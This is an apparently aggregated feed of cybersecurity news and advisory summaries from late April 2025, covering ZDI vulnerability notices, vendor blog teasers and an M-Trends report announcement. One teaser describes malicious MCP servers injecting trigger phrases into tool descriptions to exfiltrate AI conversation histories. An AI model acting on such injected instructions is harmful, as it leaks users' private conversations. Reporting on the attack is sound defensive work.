For years, the digital advertising ecosystem has struggled with a fundamental challenge: validating that each click represents genuine users with intent. Digital advertising loses its meaning when a significant portion of traffic is fraudulent, non-human, or lacks actual buying intent. As advertisers increasingly prioritize performance metrics and shift from cost-per-mille(CPM) to cost-per-click (CPC)-based models as […] The post Valid Clicks, Verified Value: Introducing Ad Click Defense for Platforms appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/ad-click-defense-advanced-click-fraud-protection/
Wiz on Cloud Security in 2025: Navigating the Future of Cyber Threats and Defense
2025-04-24T13:00:00Z | 1745499600

Guest Author: Yotam Meitar, Director, Cloud Response, Wiz The landscape of cybersecurity is rapidly evolving, particularly in cloud environments. Due to […]

https://www.guidepointsecurity.com/blog/wiz-on-cloud-security-in-2025-navigating-the-future-of-cyber-threats-and-defense/
Aryaka to Showcase Power of Unified SASE as a Service at RSA 2025
2025-04-24T12:58:59Z | 1745499539

Santa Clara, CA, April 24, 2025 – Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced the company’s participation at the RSA Conference from April 28 – May 1 in San Francisco. During the event, Dr. Aditya K. Sood, author and VP of Security Engineering and AI Strategy at... The post Aryaka to Showcase Power of Unified SASE as a Service at RSA 2025 appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-to-showcase-unified-sase-as-a-service-at-rsa-2025/
Closing the Evidence Gap with End-to-End Location Intelligence
2025-04-24T12:58:41Z | 1745499521

Encryption and OTT apps limit the value of lawful eavesdropping tools like wiretaps, but mobile networks offer a powerful engine for new insights: real-time geographical awareness using high-accuracy location. The post Closing the Evidence Gap with End-to-End Location Intelligence appeared first on SS8.

https://www.ss8.com/closing-the-evidence-gap-with-end-to-end-location-intelligence/
An FCC action that turned Wi-Fi into an enterprise powerhouse
2025-04-24T12:00:00Z | 1745496000

In 2020, the FCC opened the unlicensed 6 GHz spectrum to Wi-Fi. An explosion of innovation followed. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/an-fcc-action-that-turned-wi-fi-into-an-enterprise-powerhouse.html
An FCC action that turned Wi-Fi into an enterprise powerhouse
2025-04-24T12:00:00Z | 1745496000

In 2020, the FCC opened the unlicensed 6 GHz spectrum to Wi-Fi. An explosion of innovation followed. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m04/an-fcc-action-that-turned-wi-fi-into-an-enterprise-powerhouse.html
EMA Hybrid Multicloud Strategies: New Report Insights
2025-04-24T10:36:12Z | 1745490972

New EMA Hybrid Multicloud Strategies report reveals hybrid multicloud complexity is rising. Success hinges on cloud and network team collaboration, unified management, and a strong DDI foundation to boost visibility, automation, security, and efficiency across environments. The latest EMA report reveals that while hybrid, multicloud adoption is accelerating, many organizations still rely on siloed, inconsistent… The post EMA Hybrid Multicloud Strategies: New Report Insights appeared first on EfficientIP.

https://efficientip.com/blog/ema-hybrid-multicloud-strategies-new-report-insights/
Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028)
2025-04-24T10:01:56Z | 1745488916

As we pack our bags and prepare for the adult-er version of BlackHat (that apparently doesn’t require us to print out stolen mailspoolz to hand to people at their talks), we want to tell you about a recent adventure - a heist, if you will.No heist story

https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
Deployments to Dollars: Turning Services into Recurring Revenue
2025-04-24T09:00:00Z | 1745485200

https://www.akamai.com/blog/partners/2025/apr/deployments-dollars-turning-services-into-recurring-revenue
DslogdRAT Malware Installed in Ivanti Connect Secure
2025-04-24T06:00:00Z | 1745474400

In a previous article of JPCERT/CC Eyes, we reported on SPAWNCHIMERA malware, which infects the target after exploiting the vulnerability in Ivanti Connect Secure. However, this is not the only malware observed in recent attacks. This time, we focus on...

https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
ZDI-25-253: SonicWALL Connect Tunnel Link Following Denial-of-Service Vulnerability
2025-04-24T05:00:00Z | 1745470800

This vulnerability allows local attackers to create a denial-of-service condition on affected installations of SonicWALL Connect Tunnel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.1. The following CVEs are assigned: CVE-2025-32817.

http://www.zerodayinitiative.com/advisories/ZDI-25-253/
ZDI-25-254: Allegra extractFileFromZip Directory Traversal Remote Code Execution Vulnerability
2025-04-24T05:00:00Z | 1745470800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-3485.

http://www.zerodayinitiative.com/advisories/ZDI-25-254/
ZDI-25-255: Allegra isZipEntryValide Directory Traversal Remote Code Execution Vulnerability
2025-04-24T05:00:00Z | 1745470800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-3486.

http://www.zerodayinitiative.com/advisories/ZDI-25-255/
ZDI-25-256: Avast Free Antivirus Integer Overflow Local Privilege Escalation Vulnerability
2025-04-24T05:00:00Z | 1745470800

This vulnerability allows local attackers to escalate privileges on affected installations of Avast Free Antivirus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-3500.

http://www.zerodayinitiative.com/advisories/ZDI-25-256/
Security Alert (A25-04-23): Vulnerability in SonicWall Products
2025-04-24T04:00:00Z | 1745467200

SonicWall released a security advisory to address a vulnerability in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Data Paradox: When More Data Means Less Visibility
2025-04-24T00:00:00Z | 1745452800

Drowning in security data but missing real threats? Learn how threat actors exploit this paradox—and how to turn your data into actionable intelligence.

https://www.recordedfuture.com/blog/security-data-paradox
Now available: the 2025 State of Detection Engineering at Elastic
2025-04-24T00:00:00Z | 1745452800

The 2025 State of Detection Engineering at Elastic explores how we create, maintain, and assess our SIEM and EDR rulesets.

https://www.elastic.co/security-labs/state-of-detection-engineering-at-elastic-2025
How Attackers Use Shodan & FOFA by Lucie Cardiet
2025-04-24T00:00:00Z | 1745452800

Learn how attackers use metadata search engines like Shodan and FOFA to identify vulnerable systems and build lists of targets.

https://www.vectra.ai/blog/how-attackers-use-shodan-fofa
Is Your WAF Enough? Why Specialist Solutions Beat CDN/WAF Add-Ons for Advanced Bot & Fraud Protection
2025-04-23T20:00:41Z | 1745438441

Web Application Firewalls (WAFs) are essential for protecting web applications by filtering and monitoring HTTP/HTTPS traffic, and mitigating threats such as SQL injection and cross-site scripting (XSS). While WAFs and the more comprehensive WAAPs (Web Application and API Protection) are vital components of cybersecurity, they are not sufficient to address sophisticated bot threats and human-led […] The post Is Your WAF Enough? Why Specialist Solutions Beat CDN/WAF Add-Ons for Advanced Bot & Fraud Protection appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/waf-cdn-add-on-vs-bot-management/
SonicOS SSLVPN NULL Pointer Dereference Denial-of-Service (DoS) Vulnerability
2025-04-23T18:49:13Z | 1745434153

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition. CVE: CVE-2025-32818 Last updated: April 23, 2025, 6:49 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009
Conch Group Partners with China Building Materials Federation and Huawei to Launch Innovative AI Model for Cement Industry
2025-04-23T17:21:00Z | 1745428860

The China Building Materials Federation, Conch Group, and Huawei held an event in Wuhu, China, to showcase their AI model for the cement building materials industry.

//www.huawei.com/en/news/2025/4/conch-cement-ai
From Stranded to Supported: Helping My Customers Land Safely with FireMon
2025-04-23T14:45:15Z | 1745419515

When Skybox Security shut down, it raised real concerns for me, not just about employment, but about how the situation could affect the professional credibility I’ve built over nearly 25...

https://www.firemon.com/blog/from-stranded-to-supported-helping-my-customers-land-safely-with-firemon/
How MCP servers can steal your conversation history
2025-04-23T14:30:00Z | 1745418600

This post explains how malicious MCP servers can exploit the Model Context Protocol to covertly exfiltrate entire conversation histories by injecting trigger phrases into tool descriptions, allowing for targeted data theft against specific organizations.

https://blog.trailofbits.com/2025/04/23/how-mcp-servers-can-steal-your-conversation-history/
M-Trends 2025: Data, Insights, and Recommendations From the Frontlines
2025-04-23T14:00:00Z | 1745416800

One of the ways threat actors keep up with the constantly evolving cyber defense landscape is by raising the level of sophistication of their attacks. This trend can be seen across many of our engagements, particularly when responding to China-nexus groups. These actors have demonstrated the ability to create custom malware ecosystems, identify and use zero-day vulnerabilities in security and other appliances, leverage proxy networks akin to botnets, target edge devices and platforms that traditionally lack endpoint detection and response, and employ custom obfuscators in their malware. They take these extra steps to evade detection, stifle analysis, and ultimately stay on systems for longer periods of time.  However, not all successful attacks are highly complex and technical. Many times attackers will take advantage of the opportunities that are made available to them. This includes using credentials stolen in infostealer operations to gain initial access. Mandiant has seen such a rise in infostealer use that stolen credentials are now the second highest initial infection vector, making up 16% of our investigations. Other ways attackers are taking advantage of opportunities is by exploiting gaps and risks introduced in cloud migrations, and targeting unsecured data repositories to obtain credentials and other sensitive information.  Today we released M-Trends 2025, the 16th edition of our annual report, to help organizations stay ahead of all types of attacks. We dive deep into several trends and share data and analysis from the frontlines of our incident response engagements to arm defenders with critical insights into the latest cyber threats. aside_block ), ('btn_text', 'Read now'), ('href', 'https://cloud.google.com/security/resources/m-trends?utm_source=m-trends-launch-blog&utm_medium=blog&utm_campaign=FY25-Q2-global-GCP33067-website-dl-dgcsm-m-trends-2025-report&utm_content=m-trends-launch-blog&utm_term=-'), ('image', )])]> Data and Trends M-Trends 2025 data is based on more than 450,000 hours of Mandiant Consulting investigations. The metrics are based on investigations of targeted attack activity conducted between Jan. 1, 2024 and Dec. 31, 2024. Key findings in M-Trends 2025 include:  55% of threat groups active in 2024 were financially motivated, which marks a steady increase, and 8% of threat groups were motivated by espionage. Exploits continue to be the most common initial infection vector (33%), and for the first time stolen credentials rose to the second most common in 2024 (16%). The top targeted industries include financial (17.4%), business and professional services (11.1%), high tech (10.6%), government (9.5%), and healthcare (9.3%). Global median dwell time rose to 11 days from 10 days in 2023. Global median dwell time was 26 days when external entities notified, 5 days when adversaries notified (notably in ransomware cases), and 10 days when organizations discovered malicious activity internally. M-Trends 2025 dives deep into the aforementioned infostealer, cloud, and unsecured data repository trends, and several other topics, including: Democratic People's Republic of Korea deploying citizens as remote IT contractors, using false identities to generate revenue and fund national interests. Iran-nexus threat actors ramping up cyber operations in 2024, notably targeting Israeli entities and using a variety of methods to improve intrusion success. Attackers targeting cloud-based stores of centralized authority, such as single sign-on portals, to gain broad access. Increased targeting of Web3 technologies such as cryptocurrencies and blockchains for theft, money laundering, and financing illicit activities. Recommendations for Organizations Each article in M-Trends 2025 offers critical recommendations for organizations to enhance their cybersecurity postures, with several of them being applicable to multiple trends. We advise that organizations: Implement a layered security approach that emphasizes sound fundamentals such as vulnerability management, least privilege, and hardening. Enforce FIDO2-compliant multi-factor authentication across all user accounts, especially privileged accounts. Invest in advanced detection technologies and develop robust incident response plans.  Improve logging and monitoring practices to identify suspicious activity and reduce dwell time.  Consider threat hunting exercises to proactively search for indicators of compromise. Implement strong security controls for cloud migrations and deployments.  Regularly assess and audit cloud environments for vulnerabilities and misconfigurations. Mitigate insider risk by practicing thorough vetting processes for employees (especially remote workers), monitoring for suspicious activity, and enforcing strict access controls. Keep up-to-date with the latest threat intelligence, adapt security strategies accordingly, and regularly review and update security policies and procedures to address evolving threats.  Be Ready to Respond The M-Trends mission has always been to equip security professionals with frontline insights into the latest evolving cyberattacks and to provide practical and actionable learnings for better organizational security. Read the full M-Trends 2025 report today, and register for our M-Trends 2025 webinar series for a more in-depth look at the data, topics, and recommendations discussed in the report. The M-Trends 2025 Executive Edition is also available, featuring a high-level look at the data and trends, along with key recommendations. Listen to the M-Trends 2025 episode of the Cloud Security Podcast to learn more about what the findings mean, and how the report gets created.

https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2025/
Document My Pentest: you hack, the AI writes it up!
2025-04-23T13:17:24Z | 1745414244

Tired of repeating yourself? Automate your web security audit trail. In this post I'll introduce a new Burp AI extension that takes the boring bits out of your pen test. Web security testing can be a

https://portswigger.net/research/document-my-pentest
Why Cybersecurity Needs to Focus More on Investigation
2025-04-23T13:00:02Z | 1745413202

When we think about cybersecurity, most of us picture alarms going off, software scanning for viruses, and firewalls keeping the bad guys out. Detection and response are the heavy lifters in any modern security strategy, and rightfully so. They help us spot threats, shut them down quickly, and get back to business. But...

https://www.netscout.com/blog/why-cybersecurity-needs-focus-more-investigation
CVE-2025-23016 - Exploiter la bibliothèque FastCGI
2025-04-23T11:54:24Z | 1745409264

https://www.synacktiv.com/publications/cve-2025-23016-exploiter-la-bibliotheque-fastcgi.html
Caught in the middle: Georgia’s recent history through the sanctions lens
2025-04-23T11:23:06Z | 1745407386

Back in November 2024, Georgia’s prime minister Irakli Kobakhidze announced the end of EU accession talks, bringing Georgians into the street once again to protest against the increasingly pro-Russian faction in power. Concerned by the Georgian government’s drastic change of course in recent years, and the recent heavy crackdown on protesters, both the US and UK have turned to sanctions toolkit, with many in the EU keen to follow suit. But does Donald Trump’s return to the White House presage an about turn in policy? And how have the sanctions impacted those in power in Georgia so far? Tom Boughton and Elene Janadze chart recent history and explore what may be in store.   This article was first published by World ECR in The journal of Export Controls and Sanctions and reproduced here with kind permission.

https://www.s-rminform.com/latest-thinking/caught-in-the-middle-georgias-recent-history-through-the-sanctions-lens
Extortion and Ransomware Trends January-March 2025
2025-04-23T10:00:21Z | 1745402421

Ransomware leak site data and Unit 42 case studies reveal new trends from Q1 2025, including the most active groups, targeted industries and novel extortion tactics. The post Extortion and Ransomware Trends January-March 2025 appeared first on Unit 42.

https://unit42.paloaltonetworks.com/2025-ransomware-extortion-trends/
Patching is Risky Business: By the Gartner Numbers
2025-04-23T09:20:22Z | 1745400022

When I read Eyal’s blog, Why FWaaS is the Only Way Out of Endless Appliance Patching, I imagined a time in the immediate now (oxymoron intended); a time where the word “patching” is as quaint as rotary phones. In my mind, I was Marty McFly, jumping out of the DeLorean, shocked to discover that in... The post Patching is Risky Business: By the Gartner Numbers appeared first on Cato Networks.

https://www.catonetworks.com/blog/patching-is-risky-business-gartner-numbers/
Upozorenje: širenje malvera oponašanjem obavijesti sustava eDozvola
2025-04-23T09:03:02Z | 1745398982

Nacionalni CERT zaprimio je prijave građana o phishing porukama u kojima napadači oponašaju obavijest sustava eDozvola.  Naslov maila: “Elektronička dostava iz sustava eDozvole”  Polje pošiljatelja je lažirano i izgleda kao da je poruka poslana sa službene adrese.  U privitku se nalazi  malver za krađu lozinki iz vašeg preglednika!  Datoteka ima nastavak .img.   Datoteka s nastavkom... The post Upozorenje: širenje malvera oponašanjem obavijesti sustava eDozvola first appeared on CERT.hr.

https://www.cert.hr/upozorenje-sirenje-malvera-oponasanjem-obavijesti-sustava-edozvola/
How fraudsters abuse Google Forms to spread scams
2025-04-23T09:00:00Z | 1745398800

The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.

https://www.welivesecurity.com/en/scams/how-fraudsters-abuse-google-forms-spread-scams/
Koolid saavad uueks õppeaastaks tasuta tellida turvalise interneti õppematerjale
2025-04-23T08:26:01Z | 1745396761

Riigi Infosüsteemi Amet (RIA) andis eesti keeles välja algkoolieas lastele mõeldud juhendmaterjalid, mis aitavad interneti kasutamisega seotud ohte ära tunda ja vältida. Huvi korral saavad koolid neid endale tasuta tellida.

https://ria.ee/uudised/koolid-saavad-uueks-oppeaastaks-tasuta-tellida-turvalise-interneti-oppematerjale
MSSP Cybersecurity: Proactive Defense Against 2025 Threats
2025-04-23T08:23:01Z | 1745396581

The stakes for cybersecurity have never been higher and Managed Security Service Providers (MSSPs) sit at the frontline. Their role has evolved beyond simply managing firewalls and monitoring endpoints. Today, MSSPs must act as strategic defenders, capable of predicting, identifying, and neutralizing advanced threats before they disrupt business operations. The traditional, perimeter-based security model is […] The post MSSP Cybersecurity: Proactive Defense Against 2025 Threats appeared first on CounterCraft.

https://www.countercraftsec.com/blog/mssp-cybersecurity-proactive-defense/
ZDI-25-247: (0Day) eCharge Hardy Barth cPH2 check_req.php ntp Command Injection Remote Code Execution Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of eCharge Hardy Barth cPH2 charging stations. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-3881.

http://www.zerodayinitiative.com/advisories/ZDI-25-247/
ZDI-25-248: (0Day) eCharge Hardy Barth cPH2 nwcheckexec.php dest Command Injection Remote Code Execution Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of eCharge Hardy Barth cPH2 charging stations. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-3882.

http://www.zerodayinitiative.com/advisories/ZDI-25-248/
ZDI-25-249: (0Day) eCharge Hardy Barth cPH2 index.php Command Injection Remote Code Execution Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of eCharge Hardy Barth cPH2 charging stations. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-3883.

http://www.zerodayinitiative.com/advisories/ZDI-25-249/
ZDI-25-250: (0Day) Cloudera Hue Ace Editor Directory Traversal Information Disclosure Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cloudera Hue. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-3884.

http://www.zerodayinitiative.com/advisories/ZDI-25-250/
ZDI-25-251: (0Day) Harman Becker MGU21 Bluetooth Improper Input Validation Denial-of-Service Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows network-adjacent attackers to create a denial-of-service condition on affected installations of Harman Becker MGU21 devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-3885.

http://www.zerodayinitiative.com/advisories/ZDI-25-251/
ZDI-25-252: (0Day) Cato Networks Cato Client for macOS Helper Service Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability
2025-04-23T05:00:00Z | 1745384400

This vulnerability allows local attackers to escalate privileges on affected installations of Cato Networks Cato Client for macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

http://www.zerodayinitiative.com/advisories/ZDI-25-252/
High Threat Security Alert (A25-04-22): Vulnerability in Erlang/OTP
2025-04-23T04:00:00Z | 1745380800

Erlang has released a security advisory to address a vulnerability in Erlang/OTP.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise Uncovers Unique Risks From Resurgent Cybersecurity Vulnerabilities
2025-04-23T00:00:00Z | 1745366400

Attackers from every corner of the internet are exploiting a uniquely dangerous class of cyber flaws: resurgent vulnerabilities. GreyNoise’s latest research breaks down these vulnerabilities — how they behave, why they’re dangerous, and what defenders and policymakers need to know to stay ahead.

https://www.greynoise.io/blog/greynoise-uncovers-unique-risks-from-resurgent-cybersecurity-vulnerabilities
9X Surge in Ivanti Connect Secure Scanning Activity
2025-04-23T00:00:00Z | 1745366400

GreyNoise observed a 9X spike in suspicious scanning activity targeting Ivanti Connect Secure or Ivanti Pulse Secure VPN systems. More than 230 unique IPs probed ICS/IPS endpoints. This surge may indicate coordinated reconnaissance and possible preparation for future exploitation.

https://www.greynoise.io/blog/surge-ivanti-connect-secure-scanning-activity
What is Ring Deployment? A Guide to Phased Software Rollouts
2025-04-22T19:06:30Z | 1745348790

Summary Ring deployment is a method of gradually rolling out software updates to different user groups, starting with a small test group and expanding to the full user base.  By catching and addressing issues at their onset, we minimize risks and enhance the user experience by averting widespread disruptions.  Key practices include aligning rings with business impact, automating deployments, continuous monitoring, having rollback plans, and communicating with users throughout the process.  Exploitation of vulnerabilities increased 180% year over year from 2023 to 2024, which means that quickly and effectively securing endpoints – always a priority – will only continue to escalate. Patching these vulnerabilities promptly, but without sacrificing stability, can present operational challenges. One way to achieve this: ring deployment — a technique that progressively scales rollouts to user groups. Below, we'll explore what ring deployment is, how it works and why it's an essential strategy for IT and security teams. Understanding the ring deployment model The ring deployment model is a structured approach to software rollouts that involves deploying updates or new features in progressive stages, or "rings." Each ring represents a different group of users, starting with a small, controlled group and gradually expanding to a larger audience. This method allows teams to test and validate changes in a controlled environment before releasing them to the entire user base. Once the initial ring-based deployment proves successful and any issues are ironed out, teams can confidently expand the update to the next ring. This step-by-step expansion helps minimize the risk of widespread problems and makes the deployment more reliable. How ring-based deployment works: a step-by step guide The first step in implementing a ring deployment strategy is to define your rings. Each ring should represent a different group of users, with the size and composition of each group tailored to your organization's needs. Rings can be tailored to suit business needs, including: Test ring: a small group of internal testers or IT staff responsible for identifying critical issues. Early adopters ring: A slightly larger group of users, including key stakeholders who are willing to test new features and provide feedback. Full production ring: The final stage, where the software is released to the entire user base not covered in the test and early adopters rings. Once your rings are defined, the next step is to deploy the software to the early rings and closely monitor performance. At this stage, you’ll track performance, bugs such as app crashes and error rates and user feedback. This data will help identify any issues that need to be addressed before progressing to the next ring. After successfully deploying to the early rings and addressing any issues, the next step is to gradually expand the rollout to larger groups. This phased approach ensures that the software remains stable and performs well as it reaches a broader audience. The final stage is the full production deployment, where the software is released to the entire user base. Even after reaching this stage, it's important to continue monitoring performance and gathering feedback to make ongoing improvements. Best practices for implementing a ring deployment strategy Aligning rings with business impact levels: Ensuring that rings are aligned with the business impact levels of your organization makes sure you to protect critical business functions and promptly address potential issues. Automating deployments for efficiency: This can help improve efficiency and reduce the risk of human error. Tools and scripts can be used to automate the deployment to each ring, ensuring a consistent and reliable process. Continuous monitoring: A robust monitoring system can track performance, user feedback and any anomalies. This allows you to swiftly detect and resolve issues, ensuring a seamless user experience. Having rollback plans in case of failure: Issues can still arise after the test ring deployment. Having a rollback plan in place allows teams to quickly revert to a previous version of the software if necessary, minimizing the impact on users. Communicating with users in different rings: Keep users in each ring informed about the deployment process, including any known issues and expected timelines. This helps manage expectations and ensures that users are prepared for any changes. Following up with a user sentiment survey: Early users are invaluable, offering insights that can drive significant refinements. By actively engaging with user feedback via a user survey, teams can pinpoint issues, address bugs and uncover areas for improvement that may not have been evident during the deployment process. Key benefits of using ring deployment Reduces risk One of the primary benefits of ring deployment is the ability to catch and resolve issues early in the deployment process. By starting with a small group of users, teams can identify and address critical bugs and performance issues before they affect the entire user base, allowing for seamless facilitation of continuous improvement. This iterative process enables teams to make rapid adjustments and enhancements, ensuring that the final version of deployed patches aligns perfectly with the needs and expectations of broader user bases. Improves user experience By testing new patches with smaller groups, teams can gather valuable feedback and make necessary adjustments. Any errors that might occur with releases are caught and iterated upon before they can interrupt the majority of users. Avoids major disruptions Ring-based deployment not only reduces user disruption but also keeps productivity flowing during updates. By introducing changes gradually, users are less likely to be to be caught off guard by sudden, major shifts that could derail their workflows. This methodical, controlled rollout guarantees a smoother transition, keeping downtime and frustration to a minimum. Users can acclimate to new features and updates at a comfortable pace, which is especially crucial in enterprise settings where stability and reliability are non-negotiable. Supports iterative improvements Ring deployment supports continuous improvement by letting teams gather feedback from users at each stage of the rollout. This feedback can be used to make iterative improvements, ensuring that the final update meets user needs and expectations. Why ring deployment is a smart choice A ring-based deployment strategy can help organizations achieve a smoother and more stable deployment process, ultimately leading to better software and happier users. If your organization is looking to adopt ring deployment, start by defining your rings, automating the deployment process and maintaining effective communication with users. With careful planning and execution, ring deployment can become a valuable part of your IT and software development strategy. FAQ  What is ring deployment? Ring deployment is a strategy for software updates where new features are introduced in incremental stages, or “rings,” starting with a controlled group and broadening the scope to a larger user group over time.  What are the “rings” in ring deployment? Rings are user groups. Ring deployment usually starts with a test ring (internal testers or IT staff), an early adopters ring (a broad group of key stakeholders), and a full production ring (the entire user base).  How does ring deployment reduce risk? Ring deployment lets teams detect and resolve issues early in the deployment process, before they impact the entire user base.

https://www.ivanti.com/blog/ring-deployment
Channel Partners Conference & Expo 2025
2025-04-22T18:05:56Z | 1745345156

The post Channel Partners Conference & Expo 2025 appeared first on Open Systems.

https://www.open-systems.com/blog/channel-partners-conference-expo-2025/
Expanding Third-Party VPN Control for Stronger Corporate Network Protection
2025-04-22T17:00:00Z | 1745341200

Unauthorized VPN usage can pose a serious risk to corporate networks. Employees or other users may unknowingly tunnel malicious traffic or bypass critical security policies with unsanctioned third-party VPN solutions. ThreatSTOP is committed to helping organizations tackle these concerns by providing precise and customizable VPN control within our Protective DNS and IP Defense platforms.

https://www.threatstop.com/blog/expanding-third-party-vpn-control-for-stronger-corporate-network-protection
AI is Here: Who’s in Charge?
2025-04-22T13:58:02Z | 1745330282

Everybody and their brother (and sister) is talking about AI—and for good reason. AI can be a tremendous business enabler. […]

https://www.guidepointsecurity.com/blog/ai-is-here-10-reasons-your-governance-plan-should-be-too/
Are Insurers “At-Fault” for Their Observability Gaps?
2025-04-22T13:55:47Z | 1745330147

Digital tools such as mobile apps, quoting engines, and telematics are now table stakes in insurance. But behind every digital interaction lies a less visible challenge: technology that doesn’t always work as expected—and isn’t attended to until it impacts policyholders. Could gaps in network observability be silently...

https://www.netscout.com/blog/are-insurers-fault-their-observability-gaps
A Look at a Novel Discord Phishing Attack
2025-04-22T13:00:00Z | 1745326800

Written by ARC Labs contributors, Adam Paulina Binary Defense ARC Labs researchers recently investigated what appears to be a novel infostealer discovered in the wild and named it MalenuStealer.   An infostealer is a type of malicious software crafted to gather personal data (usernames, passwords, and payment information) from victims. Discord, on the other hand, is a popular online […] The post A Look at a Novel Discord Phishing Attack appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/a-look-at-a-novel-discord-phishing-attack/
CI/CD Security Best Practices
2025-04-22T12:57:38Z | 1745326658

Software development moves fast – really fast. It can also involve multiple teams working from different locations around the world. However, while speed and collaboration can be great for developers and businesses, they can also create security challenges.  With more entry points and less time to catch potential threats, each commit, build, and deployment is […]

https://blog.jetbrains.com/teamcity/2025/04/ci-cd-security-best-practices/
Fifteen Zeroes: Inside the Quadrillion Cyberthreat Benchmark Report
2025-04-22T12:45:00Z | 1745325900

A quadrillion is one of those numbers that manages to be both intuitive and hard to visualize at the same time. It’s a one followed by fifteen zeroes. It’s a million billion. One quadrillion seconds is 31 million years (which, for reference, takes us back to when the Himalayas were just starting to, y’know, exist). […] The post Fifteen Zeroes: Inside the Quadrillion Cyberthreat Benchmark Report appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/fifteen-zeroes-inside-the-quadrillion-cyberthreat-benchmark-report/
Why Industry Conferences Are More Important Than Ever
2025-04-22T12:45:00Z | 1745325900

Why industry conferences are more important than ever - and where to find RiskRecon this quarter!  It's easy to get caught up in the day-to-day demands of managing third-party risk in today's fast-paced world. But stepping out of the office and into an industry conference isn't just a break from the routine - it's an essential part of staying connected and ahead of the curve.

https://blog.riskrecon.com/why-industry-conferences-are-more-important-than-ever
Enterprise Networking in 2025: Gartner’s Strategic Roadmap & Trends
2025-04-22T12:33:00Z | 1745325180

This blog summarizes the key takeaways from the report to help IT and network leaders understand the challenges ahead and where to focus as they modernize their infrastructure. It’s meant to help IT and network teams cut through the noise, pinpoint where their current approach may fall short, and prioritize the areas that will have the biggest impact on performance, security, and scalability. The post Enterprise Networking in 2025: Gartner’s Strategic Roadmap & Trends first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/enterprise-networking-in-2025-gartners-strategic-roadmap-trends/
A Sustainability Program with Regional Nuance
2025-04-22T12:00:00Z | 1745323200

https://www.akamai.com/blog/sustainability/2025/apr/a-sustainability-program-with-regional-nuance
The AI-Powered Reboot: Rethinking Defense for Web Apps and APIs
2025-04-22T10:00:00Z | 1745316000

https://www.akamai.com/blog/security-research/2025/apr/rethinking-defense-web-apps-api-new-soti
Will super-smart AI be attacking us anytime soon?
2025-04-22T09:00:00Z | 1745312400

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

https://www.welivesecurity.com/en/cybersecurity/super-smart-ai-attacking/
Detecting Multi-Stage Infection Chains Madness
2025-04-22T07:00:00Z | 1745305200

During our daily tracking and analysis routine at Sekoia TDR team (Threat Detection & Research), we have been monitoring an attacker infrastructure internally called “Cloudflare tunnel infrastructure to deliver multiple RATs”.  This infrastructure is used by several actors to host malicious files and deliver remote access trojans (RAT). Several security vendors (Forcepoint, Fortinet,  Orange, Proofpoint) […] La publication suivante Detecting Multi-Stage Infection Chains Madness est un article de Sekoia.io Blog.

https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/
ZDI-CAN-26719: Delta Electronics
2025-04-22T05:00:00Z | 1745298000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Natnael Samson (@NattiSamson)' was reported to the affected vendor on: 2025-04-22, 45 days ago. The vendor is given until 2025-08-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26018: Fuji Electric
2025-04-22T05:00:00Z | 1745298000

